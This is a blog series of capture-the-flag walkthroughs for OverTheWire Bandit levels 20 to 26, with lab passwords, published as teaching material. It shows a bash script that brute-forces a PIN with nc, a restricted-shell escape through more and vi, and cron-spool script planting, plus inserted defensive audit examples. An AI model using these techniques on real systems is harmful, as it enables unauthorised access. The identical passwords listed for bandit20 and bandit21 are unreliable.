Tuesday, October 11, 2022

Bandit26

 







bandit level26

ssh server: bandit.labs.overthewire.org port 2220

username: bandit26

password: c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1



Remember that in the last challenge we were disconnected right after logging in with the private key for bandit26. The same thing happens this time.

So again we will reduce the screen size and go into the edit mode of the more command. This time, however, reading or editing a file is not enough: we need to execute commands, which means we need a normal shell.

We can call the bash shell using the set shell command.

Now we can execute any command we want, so we will run the ls command as advised in the challenge description.




We know the usage of bandit27-do



This is the password for the next level, bandit27.

Till we meet there.


Your comments and feedback are highly appreciated

Thank You


Bandit25

 





bandit level25

ssh server: bandit.labs.overthewire.org port 2220

username: bandit25

password: p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d


We have no information about this challenge, so let's start by finding out what is in our home directory.


Here we have a file named bandit26.sshkey. This should be the private key for bandit26, so all we need to do is connect with this key:
$ ssh -i bandit26.sshkey bandit26@localhost -p 2220


The problem here is that right after we connect and the bandit26 banner is shown, we are disconnected. The challenge description hints that the bandit26 shell is not a normal shell, so let's first check the shell type for bandit26 and compare it with the bandit25 shell type.



The shell for bandit26 is a custom shell located in /usr/bin, so we need to read it to understand its behavior.



All this shell does is show the contents of a file named text.txt from the home directory of bandit26 using the more command, and then exit.

As we know, the more command shows as much content as fits the display size and then waits for input from the user before showing more lines, so we can reduce the screen size and then try to connect again.



Instead of asking it to show more lines, we will ask it to open the editor using the "v" command of more.



Then we ask it to edit the bandit26 password file, which is stored in the /etc directory.
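
The login-shell comparison described above can be run as an audit over every account, together with a check for wrappers that start a pager. This is an added example, not part of the original post; the passwd lines, the allow-list and the path /usr/bin/custom-shell are constructed placeholders.

```shell
#!/bin/sh
# Added example: audit login shells. All sample data below is constructed.

# Print "user shell" for each account in passwd-format file $1 whose
# login shell (7th field) is not listed in allow-list file $2, which
# uses the /etc/shells format: one path per line, '#' for comments.
unusual_shells() {
    awk -F: '
        NR == FNR { if ($0 != "" && $0 !~ /^#/) ok[$0] = 1; next }
        !($7 in ok) { print $1, $7 }
    ' "$2" "$1"
}

# Succeed if file $1 starts an interactive pager or editor, which a
# restricted login shell cannot safely hand to the user.
calls_pager() {
    grep -Eqw 'more|less|man|vi|vim' "$1"
}

demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT

cat > "$demo/passwd" <<'EOF'
bandit25:x:11025:11025::/home/bandit25:/bin/bash
bandit26:x:11026:11026::/home/bandit26:/usr/bin/custom-shell
EOF

cat > "$demo/shells" <<'EOF'
# constructed allow-list
/bin/sh
/bin/bash
EOF

# Constructed wrapper with the behaviour the post describes.
cat > "$demo/custom-shell" <<'EOF'
#!/bin/sh
more ~/text.txt
exit 0
EOF

report=$(unusual_shells "$demo/passwd" "$demo/shells")
echo "non-standard login shells: $report"
calls_pager "$demo/custom-shell" && echo "wrapper starts a pager"
```

A wrapper flagged by both checks restricts nothing, because the pager's editor and shell commands remain available to whoever logs in.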





This is the password for the next level, bandit26.

Till we meet there.


Your comments and feedback are highly appreciated

Thank You


Bandit24

 



 




bandit level24

ssh server: bandit.labs.overthewire.org port 2220

username: bandit24

password: VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar




In this challenge there is a listener on port 30002 waiting to receive the bandit24 password followed by a four-digit PIN code. If the values are correct, it will reply with the bandit25 password. Let's try to connect and submit the values.



As you see, the system refuses to send the password unless it receives the correct combination: the bandit24 password and the correct PIN code. The problem is that we need to find out the secret PIN code, which means finding the correct value among 10000 possibilities.

So we are going to create a script that generates all 10000 combinations, then opens the connection with the listener and submits the bandit24 password with each of the 10000 PIN codes, line by line, until it receives the correct PIN code.


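#!/bin/bash
# Current level's password, sent before every candidate PIN
bandit24pass=VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar

# Build the list: one "password PIN" line per candidate.
# {0000..9999} zero-pads, so the PINs run 0000, 0001, ... 9999
for i in {0000..9999}
do
        echo "$bandit24pass $i"
done > list

# Send every line over one connection and save the replies
nc localhost 30002 < list > results

# Show only the replies that do not contain "Wrong"
grep -v Wrong results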


This script stores the bandit24 password in a variable named bandit24pass, then starts a loop that iterates over the values from "0000" to "9999". Each iteration adds a line to a file named "list", consisting of the bandit24 password followed by the loop value, so at the end we have a file with 10000 lines, each holding the bandit24 password followed by a four-digit PIN. We then connect to the listener on port 30002 using the file "list" as input and store the listener's response in a file named "results". Finally we read the "results" file, searching for any line that doesn't contain the word "Wrong"; this shows us the bandit25 password.


Don't forget to change the script file permissions to make it executable before running it.



This is the password for the next level, bandit25.

Till we meet there.


Your comments and feedback are highly appreciated

Thank You


Wednesday, September 28, 2022

Bandit23



 


bandit level23

ssh server: bandit.labs.overthewire.org port 2220

username: bandit23

password: QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G




It's just like the last challenge: we need to find the configuration of the cron job to trace it.





This time the script first stores the username of the user running it in the variable myname, then enters /var/spool/$myname/foo.

It then scans all the files in the foo directory. If a file is owned by bandit23 it runs it, and if not it does not run it, but either way it deletes the file.

So all we need to do is put a script in the foo directory, but it is better to keep a backup of it in case we need to change it.



Create a directory in /tmp and, inside it, create the script, which will read the bandit24 password and copy it to our temp directory.



We need to change the permissions of the directory and the script to allow bandit24 to read and run the script and to write into the temp directory, and also copy the script into the /var/spool/bandit24/foo directory.



It's a cron job, so all we need to do is wait: the job will run, call the script in the foo directory, and come back with the password.
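
The job logic described above (run files owned by one named user, delete everything), modelled on a scratch directory. This is an added example, not the level's script or code from the original post; run_spool, drop_job and the marker files are hypothetical names.

```shell
#!/bin/sh
# Added example: a local model of the job logic the post describes.
# It works on a scratch directory; nothing here touches /var/spool.

# Run each file in directory $1 that is owned by user $2, delete every
# file whether or not it ran, and print how many ran. Anything executed
# here runs with the privileges of whoever calls run_spool.
run_spool() {
    spool=$1; trusted=$2; ran=0
    for f in "$spool"/* "$spool"/.[!.]*; do
        [ -f "$f" ] || continue
        owner=$(stat --format '%U' "$f")
        if [ "$owner" = "$trusted" ]; then
            timeout -s 9 60 "$f" && ran=$((ran + 1))
        fi
        rm -f "$f"
    done
    echo "$ran"
}

demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT
mkdir "$demo/spool"
me=$(stat --format '%U' "$demo")        # owner name as stat reports it

# Constructed job: it only records that it was executed.
drop_job() {
    printf '#!/bin/sh\necho ran > "%s/%s.ran"\n' "$demo" "$1" \
        > "$demo/spool/$1"
    chmod 755 "$demo/spool/$1"
}

drop_job job1.sh
ran_trusted=$(run_spool "$demo/spool" "$me")            # owner matches
drop_job job2.sh
ran_other=$(run_spool "$demo/spool" "some-other-user")  # owner differs
echo "ran when owner matched: $ran_trusted, when it did not: $ran_other"
```

The owner check only establishes who wrote the file, so the job hands its own privileges to that user; a scheduled job should not execute content from a directory that a less privileged account can write to.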




This is the password for the next level, bandit24.

Till we meet there.


Your comments and feedback are highly appreciated

Thank You


Monday, September 26, 2022

Bandit22

 








bandit level22

ssh server: bandit.labs.overthewire.org port 2220

username: bandit22

password: WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff



It's just like the last challenge: we need to find the configuration of the cron job to trace it.




Our target cron job is cronjob_bandit23; reading it reveals the location of the script that it runs.


So we go and read the script at /usr/bin/cronjob_bandit23.sh.



At the beginning, the script creates a variable named "myname" and gives it the output of the whoami command. It then creates another variable named "mytarget": it echoes the text "I am user (the value of the myname variable)", calculates the MD5 hash of this text, and cuts only the hash value from the output. Finally it writes the password of bandit23 into a file in /tmp named after that MD5 value. This only happens if the user running the script is bandit23; for any other user the hash value would be different than expected, and the script would read the password of the user running it, not bandit23.

But it is a cron job, so it runs on a time schedule as the bandit23 user. All we need is to know the filename, which can easily be found by emulating what the script does.



This is the file name; we only need to read this file.
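
The naming scheme described above, next to a hardened alternative, run in a scratch directory. This is an added example, not the level's script or code from the original post; the function names, demo-user and the secret value are constructed.

```shell
#!/bin/sh
# Added example: function names and sample values are constructed.

# Derive the file name the way the post describes: hash the text
# "I am user <name>" with MD5 and keep only the hex digest.
predictable_name() {
    echo "I am user $1" | md5sum | cut -d ' ' -f 1
}

# Weak pattern: the secret lands in a shared directory under a name
# that any local user can recompute. $1 = user, $2 = secret, $3 = dir.
write_predictable() {
    target="$3/$(predictable_name "$1")"
    printf '%s\n' "$2" > "$target"
    echo "$target"
}

# Hardened pattern: mktemp picks a random name and creates the file
# with mode 0600, so only the owner can read it. $1 = secret, $2 = dir.
write_private() {
    target=$(umask 077; mktemp "$2/secret.XXXXXXXXXX") || return 1
    printf '%s\n' "$1" > "$target"
    echo "$target"
}

# Constructed demo in a scratch directory (no real credentials).
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT

weak=$(write_predictable demo-user 'constructed-secret' "$demo_dir")
# The same path, computed without listing the directory:
guess="$demo_dir/$(predictable_name demo-user)"
strong=$(write_private 'constructed-secret' "$demo_dir")

echo "weak file:   $weak"
echo "recomputed:  $guess"
echo "strong file: $strong (mode $(stat --format '%a' "$strong"))"
```

The hash adds no secrecy because its only input is the username; the file's name and permissions are what decide who can read it.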



This is the password for the next level, bandit23.

Till we meet there.


Your comments and feedback are highly appreciated

Thank You


Bandit21

 






bandit level21

ssh server: bandit.labs.overthewire.org port 2220

username: bandit21

password: NvEJF7oVjkddltPSrdKEFOllh9V1IBcq



A new type of challenge: this time we are dealing with a cron job script. First of all, we find the script related to our challenge.



First we read the job configuration under /etc/cron.d.



This configuration shows that it executes a script saved in /usr/bin/cronjob_bandit22.sh.



The script reads the bandit22 password from /etc/bandit_pass/bandit22 and sends it to a temp directory, so all we need to do is read this temp directory.



This is the password for the next level, bandit22.

Till we meet there.


Your comments and feedback are highly appreciated

Thank You


Bandit20

 






bandit level20

ssh server: bandit.labs.overthewire.org port 2220

username: bandit20

password: NvEJF7oVjkddltPSrdKEFOllh9V1IBcq



Just like the last challenge, we have a program in the home directory of our user; when executed, it tells us how to get the next level password.



Here we need to select a port for the suconnect program to connect to. On the other side, we need to open another terminal and initiate a listener on the same port using the nc command. The listener will send the password of bandit20 so that suconnect can verify it and reply with the bandit21 password.





The listener sends the password and waits for the reply. In the other terminal, suconnect checks that the password sent matches the one it has stored, so it sends the bandit21 password to the nc terminal.




This is the password for the next level, bandit21.

Till we meet there.


Your comments and feedback are highly appreciated

Thank You

